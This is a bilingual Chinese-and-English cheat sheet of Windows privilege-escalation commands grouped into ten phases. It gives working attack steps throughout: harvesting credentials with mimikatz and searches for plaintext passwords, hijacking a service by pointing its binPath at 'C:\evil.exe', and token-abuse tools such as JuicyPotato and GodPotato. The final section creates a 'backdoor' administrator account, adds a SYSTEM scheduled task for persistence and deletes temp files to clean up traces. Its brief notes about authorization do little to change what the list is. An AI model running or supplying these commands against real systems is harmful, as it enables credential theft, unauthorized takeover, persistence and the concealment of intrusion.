Windows权限提升方法

使用说明:逐项执行命令,记录输出以分析提升路径。若需进一步工具(如PowerUp.ps1),可在PowerShell中加载执行。建议在测试环境中操作,避免生产系统风险。

🧭 一、信息收集阶段(Information Gathering)

whoami → 查看当前用户名和权限级别。

whoami /priv → 列出当前用户的特权(如 SeImpersonatePrivilege)。

hostname → 获取主机名以识别目标系统。

systeminfo → 查看操作系统版本、补丁与体系结构。

wmic qfe get Caption,Description,HotFixID,InstalledOn → 枚举已安装补丁,寻找未修复 CVE 线索。

set → 打印环境变量(如 TEMP、PATH、USERNAME 等)。

echo %USERNAME% && echo %USERDOMAIN% → 获取当前用户与域信息。

net users → 枚举本地用户账户。

net localgroup administrators → 列出本地管理员成员。

ipconfig /all → 网络接口、DNS 与网关信息。

route print → 路由表以识别潜在跳板/网段。

netstat -ano → 查看监听端口及对应 PID。

tasklist /svc → 列出运行进程及其服务映射。

wmic service list brief → 快速枚举服务状态与启动账户。

reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → 查找开机自启项与可被滥用的路径。

⚙️ 二、凭据收集(Credential Harvesting)

cmdkey /list → 查看系统保存的凭据条目。

runas /savecred /user:Administrator cmd.exe → 测试是否可利用已保存凭据(若有的话)。

type %APPDATA%\\Microsoft\\Credentials\\* → 检查可能的凭据存储文件。

findstr /si password *.txt *.ini *.config → 在文件中搜索明文密码痕迹。

reg query HKLM /f password /t REG_SZ /s → 在注册表中搜索明文密码字段。

mimikatz.exe (sekurlsa::logonpasswords) → 从 LSASS 提取明文密码/哈希/票据(仅在授权范围内)。

🧱 三、服务与配置漏洞(Service Misconfiguration)

sc qc <service_name> → 查看服务二进制路径、启动账户与配置。

icacls "C:\\path\\to\\service.exe" → 检查服务可执行文件的文件权限写入情况。

sc config <service_name> binPath= "C:\\evil.exe" → 修改服务执行路径(需权限,常用于持久化)。

accesschk.exe -uws "Everyone" "C:\\Program Files\\..." → 检查可写目录与服务文件夹权限。

wmic service get name,startname,pathname → 批量列出服务及其启动主体与路径。

🧩 四、自动运行与计划任务(Autoruns / Scheduled Tasks)

schtasks /query /fo LIST /v → 枚举计划任务与调用命令。

icacls "C:\\path\\to\\task.exe" → 检查计划任务所调用程序的可修改性。

reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → 用户级自启项枚举。

wmic startup get caption,command → 查看自动启动项与对应命令。

🧨 五、提权特权(Privilege Escalation Primitives)

whoami /priv → 确认是否存在高危特权(SeImpersonate, SeAssignPrimaryToken 等)。

PrintSpoofer.exe -i -c cmd → 利用 SeImpersonatePrivilege(若存在)尝试提权。

JuicyPotato.exe -t * -p cmd.exe -l 1337 → 通过 RPC/COM 提权(针对老系统/不当配置)。

GodPotato.exe -cmd "cmd.exe" → 新版系统可用的提权尝试(视环境而定)。

🧰 六、软件漏洞(Software Exploitation)

wmic product get name,version → 列出已安装程序与版本以对照漏洞库。

dir "C:\\Program Files" → 人工识别可能不安全的第三方软件。

findstr /si "install" *.log *.txt → 在安装日志中查找泄露的凭据或路径信息。

使用 CVE/ExploitDB/厂商公告 进行版本-漏洞匹配 → 将已知漏洞转化为可执行利用链。

🗝️ 七、注册表与权限问题(Registry Abuse)

reg query HKLM\\System\\CurrentControlSet\\Services → 查找可被修改的服务注册表项。

icacls C:\\Windows\\System32 → 检查关键系统目录的权限异常。

reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System → 检查 UAC / 策略配置。

reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon → 检查 AutoAdminLogon 等自动登录配置。

🕵️ 八、令牌与进程劫持(Token & Process Hijacking)

whoami /groups → 查看当前用户所属组与可用令牌。

tasklist /fi "username eq SYSTEM" → 查找 SYSTEM 级进程以评估令牌偷取机会。

psexec.exe -s cmd.exe → 使用 PsTools 在本机以 SYSTEM 权限运行命令(需可执行权限)。

使用 Process Explorer 进行可视化令牌/句柄分析 → 查找可借用的进程令牌。

🧿 九、提权自动化工具(Automation Tools)

winPEASx64.exe → 自动化枚举潜在提权向量与 misconfig。

Seatbelt.exe → 快速收集系统安全与配置信息。

PowerUp.ps1 → PowerShell 脚本化的提权检查。

SharpUp.exe → C# 版提权检查,适合红队/内网场景。

PrivescCheck.ps1 → 全面 PowerShell 提权扫描。

🔥 十、持久化与清理(Persistence & Cleanup)

net user backdoor P@ssw0rd /add → 创建备用用户(注意合规与授权)。

net localgroup administrators backdoor /add → 将后门用户加入管理员组。

schtasks /create /tn "UpdateCheck" /tr "cmd.exe /c whoami > C:\\proof.txt" /sc onlogon /ru SYSTEM → 以 SYSTEM 权限创建持久计划任务。

del /f /q C:\\Windows\\Temp\\* → 清理痕迹(谨慎操作,记录审计行为)。

Windows Privilege Escalation Methods

Usage: Execute commands step by step and record the output to analyze escalation paths. If further tools are required (e.g., PowerUp.ps1), they can be loaded and executed in PowerShell. It is recommended to operate in a test environment to avoid risks to production systems.

🧭 1. Information Gathering

whoami → View the current username and privilege level.

whoami /priv → List the privileges of the current user (e.g., SeImpersonatePrivilege).

hostname → Get the hostname to identify the target system.

systeminfo → View the operating system version, patches, and architecture.

wmic qfe get Caption,Description,HotFixID,InstalledOn → Enumerate installed patches to look for clues about unpatched CVEs.

set → Print environment variables (e.g., TEMP, PATH, USERNAME, etc.).

echo %USERNAME% && echo %USERDOMAIN% → Get the current user and domain information.

net users → Enumerate local user accounts.

net localgroup administrators → List members of the local administrators group.

ipconfig /all → Network interface, DNS, and gateway information.

route print → Routing table to identify potential jump hosts/network segments.

netstat -ano → View listening ports and their corresponding PIDs.

tasklist /svc → List running processes and their service mappings.

wmic service list brief → Quickly enumerate service statuses and startup accounts.

reg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → Find startup items and paths that can be abused.

⚙️ 2. Credential Harvesting

cmdkey /list → View system-saved credential entries.

runas /savecred /user:Administrator cmd.exe → Test if saved credentials can be used (if any).

type %APPDATA%\\Microsoft\\Credentials\\* → Check possible credential storage files.

findstr /si password *.txt *.ini *.config → Search for plaintext password traces in files.

reg query HKLM /f password /t REG_SZ /s → Search the registry for plaintext password fields.

mimikatz.exe (sekurlsa::logonpasswords) → Extract plaintext passwords/hashes/tickets from LSASS (only within authorized scope).

🧱 3. Service Misconfiguration

sc qc <service_name> → View the service binary path, startup account, and configuration.

icacls "C:\\path\\to\\service.exe" → Check the file permission write access of the service executable.

sc config <service_name> binPath= "C:\\evil.exe" → Modify the service execution path (requires privileges, often used for persistence).

accesschk.exe -uws "Everyone" "C:\\Program Files\\..." → Check writable directories and service folder permissions.

wmic service get name,startname,pathname → Batch list services and their startup principals and paths.

🧩 4. Autoruns / Scheduled Tasks

schtasks /query /fo LIST /v → Enumerate scheduled tasks and their invoked commands.

icacls "C:\\path\\to\\task.exe" → Check the modifiability of the program invoked by a scheduled task.

reg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run → Enumerate user-level startup items.

wmic startup get caption,command → View auto-start items and their corresponding commands.

🧨 V. Privilege Escalation Primitives

whoami /priv → Check for the presence of high-risk privileges (SeImpersonate, SeAssignPrimaryToken, etc.).

PrintSpoofer.exe -i -c cmd → Attempt privilege escalation using SeImpersonatePrivilege (if present).

JuicyPotato.exe -t * -p cmd.exe -l 1337 → Privilege escalation via RPC/COM (for older systems/misconfigurations).

GodPotato.exe -cmd "cmd.exe" → Privilege escalation attempt for newer systems (environment dependent).

🧰 VI. Software Exploitation

wmic product get name,version → List installed programs and versions for vulnerability database cross-referencing.

dir "C:\\Program Files" → Manually identify potentially insecure third-party software.

findstr /si "install" *.log *.txt → Search for leaked credentials or path information in installation logs.

Use CVE/ExploitDB/vendor advisories for version-vulnerability matching → Convert known vulnerabilities into executable exploit chains.

🗝️ VII. Registry Abuse

reg query HKLM\\System\\CurrentControlSet\\Services → Find service registry keys that can be modified.

icacls C:\\Windows\\System32 → Check for permission anomalies in critical system directories.

reg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System → Check UAC / policy configuration.

reg query HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon → Check for auto-login configurations like AutoAdminLogon.

🕵️ VIII. Token & Process Hijacking

whoami /groups → View current user group memberships and available tokens.

tasklist /fi "username eq SYSTEM" → Find SYSTEM-level processes to assess token stealing opportunities.

psexec.exe -s cmd.exe → Use PsTools to run commands with SYSTEM privileges locally (requires execute permissions).

Use Process Explorer for visual token/handle analysis → Identify process tokens that can be borrowed.

🧿 IX. Automation Tools

winPEASx64.exe → Automated enumeration of potential privilege escalation vectors and misconfigurations.

Seatbelt.exe → Rapid collection of system security and configuration information.

PowerUp.ps1 → PowerShell-scripted privilege escalation checks.

SharpUp.exe → C# version of privilege escalation checks, suitable for red team/internal network scenarios.

PrivescCheck.ps1 → Comprehensive PowerShell privilege escalation scan.

🔥 X. Persistence & Cleanup

net user backdoor P@ssw0rd /add → Create a backup user (note compliance and authorization).

net localgroup administrators backdoor /add → Add the backdoor user to the administrators group.

schtasks /create /tn "UpdateCheck" /tr "cmd.exe /c whoami > C:\\proof.txt" /sc onlogon /ru SYSTEM → Create a persistent scheduled task with SYSTEM privileges.

del /f /q C:\\Windows\\Temp\\* → Clean up traces (use with caution, log audit actions).